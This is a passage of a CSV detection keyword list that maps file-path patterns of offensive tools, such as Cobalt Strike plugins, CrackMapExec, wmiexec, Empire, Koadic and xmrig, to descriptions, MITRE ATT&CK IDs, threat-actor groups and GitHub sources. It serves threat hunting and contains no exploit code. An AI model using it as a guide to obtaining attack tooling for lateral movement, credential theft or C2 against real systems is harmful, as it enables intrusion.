- Mustang Panda - Chimera - APT29,C2,https://github.com/mez-0/winrmdll,1,1,N/A,10,10,138,27,2021-09-11T13:44:16Z,2021-09-11T13:40:22Z -*/winrm.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/winrmdll*,offensive_tool_keyword,cobaltstrike,C++ WinRM API via Reflective DLL,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mez-0/winrmdll,1,1,N/A,10,10,138,27,2021-09-11T13:44:16Z,2021-09-11T13:40:22Z -*/winrm-reflective-dll/*,offensive_tool_keyword,cobaltstrike,C++ WinRM API via Reflective DLL,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mez-0/winrmdll,1,1,N/A,10,10,138,27,2021-09-11T13:44:16Z,2021-09-11T13:40:22Z -*/Winsocky.git*,offensive_tool_keyword,cobaltstrike,Winsocket for Cobalt Strike.,T1572 - T1041 - T1105,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/WKL-Sec/Winsocky,1,1,N/A,10,10,79,13,2023-07-06T11:47:18Z,2023-06-22T07:00:22Z -*/wiresocks.git*,offensive_tool_keyword,wiresocks,Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,Defense Evasion,https://github.com/sensepost/wiresocks,1,1,N/A,9,3,250,24,2022-09-29T07:41:16Z,2022-03-23T12:27:07Z -*/wmeye/*,offensive_tool_keyword,WMEye,WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement,T1210 - T1570,TA0001 - TA0002 - TA0003 - TA0004 - TA0009,N/A,N/A,POST Exploitation tools,https://github.com/pwn1sher/WMEye,1,1,N/A,N/A,4,334,54,2021-12-24T05:38:50Z,2021-09-07T08:18:30Z -*/WMI Lateral Movement/*,offensive_tool_keyword,cobaltstrike,Collection of beacon BOF written to learn windows and cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 
- T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/CobaltStrike-BOF,1,1,N/A,10,10,297,54,2023-02-24T13:12:14Z,2020-10-08T01:12:41Z -*/wmi.dropper*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/WMI/wmi.py*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/wmiexec.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/wmiexec/*,offensive_tool_keyword,wmiexec,Set of python scripts which perform different ways of command execution via WMI protocol,T1047 - T1059 - T1070 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/WKL-Sec/wmiexec,1,1,N/A,N/A,2,145,21,2023-06-29T03:30:09Z,2023-06-21T13:15:04Z -*/wmiexec2.git*,offensive_tool_keyword,wmiexec2,wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Lateral Movement,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -*/wmiexec-Pro*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,1,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -*/wmisploit*,offensive_tool_keyword,Wmisploit,WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.,T1087 - T1059.001 - T1047,TA0003 - TA0002 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/secabstraction/WmiSploit,1,1,N/A,N/A,2,163,39,2015-08-28T23:56:00Z,2015-03-15T03:30:02Z -*/word_list.c,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password 
cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/word_list.h,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/wordlists/owa_directories.txt*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,1,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*/wordlists/skype-directories.txt*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,1,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*/workflow/test/dirbscan.yaml*,offensive_tool_keyword,Osmedeus,Osmedeus - A Workflow Engine for Offensive Security,T1595,TA0043,N/A,N/A,Exploitation Tools,https://github.com/j3ssie/osmedeus,1,1,N/A,N/A,10,4712,845,2023-09-16T05:02:26Z,2018-11-10T04:17:18Z -*/wpaf/finder.py*,offensive_tool_keyword,wpaf,WordPress admin finder,T1596,TA0007,N/A,N/A,Web Attacks,https://github.com/kancotdiq/wpaf,1,0,N/A,N/A,1,51,8,2018-07-12T04:55:58Z,2018-07-11T18:09:11Z -*/wsdd-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ws-dirs.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*/ws-files.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*/WSPCoerce.git*,offensive_tool_keyword,WSPCoerce,PoC to coerce authentication from Windows hosts using MS-WSP,T1557.001 - T1078.003 - T1059.003,TA0006 - TA0004 - TA0002,N/A,N/A,Exploitation tools,https://github.com/slemire/WSPCoerce,1,0,N/A,9,3,202,29,2023-09-07T14:43:36Z,2023-07-26T17:20:42Z -*/wwlib/lolbins/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike payload generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 
- Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dr0op/CrossNet-Beta,1,1,N/A,10,10,352,56,2022-07-18T06:23:16Z,2021-02-08T10:52:39Z -*/www/exploit.html*,offensive_tool_keyword,POC,Just another PoC for the new MSDT-Exploit,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed,1,1,N/A,N/A,4,387,57,2023-04-13T16:46:26Z,2022-06-02T12:33:18Z -*/x0rz/*,offensive_tool_keyword,Github Username,github repo username hosting exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/x0rz,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/x11-access.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/x64_slim.dll*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1110,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/xan7r/kerberoast*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/xan7r/kerberoast,1,1,N/A,N/A,1,71,20,2017-07-22T22:28:12Z,2016-06-08T22:58:45Z -*/xar-1.5.2.tar.gz*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1111,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/xdmcp-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/xen-mimi.ps1*,offensive_tool_keyword,cobaltstrike,Erebus CobaltStrike post penetration testing plugin,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DeEpinGh0st/Erebus,1,1,N/A,10,10,1356,214,2021-10-28T06:20:51Z,2019-09-26T09:32:00Z -*/xml_attack.txt*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*/xml_attacks.txt*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*/xmlrpc-methods.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/xmpp-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/xmpp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/xmrig-*-gcc-win64.zip*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,1,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*/xmrig.exe*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,1,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*/xmrig.git*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,1,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*/xndpxs/CVE-2022-0847*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/xndpxs/CVE-2022-0847,1,1,N/A,N/A,1,8,7,2022-03-07T17:59:12Z,2022-03-07T17:51:02Z -*/xor/stager.txt*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Loader by Golang,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 
- T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/timwhitez/Doge-Loader,1,1,N/A,10,10,277,61,2021-04-22T08:24:59Z,2020-10-09T04:47:54Z -*/xor/xor.go*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Loader by Golang,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/timwhitez/Doge-Loader,1,1,N/A,10,10,277,61,2021-04-22T08:24:59Z,2020-10-09T04:47:54Z -*/XOR_b64_encrypted/*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - 
TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*/XorObfuscation.cs*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,1,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*/xpath_injection.txt*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*/xPipe/*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/xPipe,1,1,N/A,10,10,73,21,2023-03-08T15:51:47Z,2021-12-07T22:56:30Z -*/xss_robertux.txt*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*/xxe_fuzz.txt*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*/yanghaoi/_CNA*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 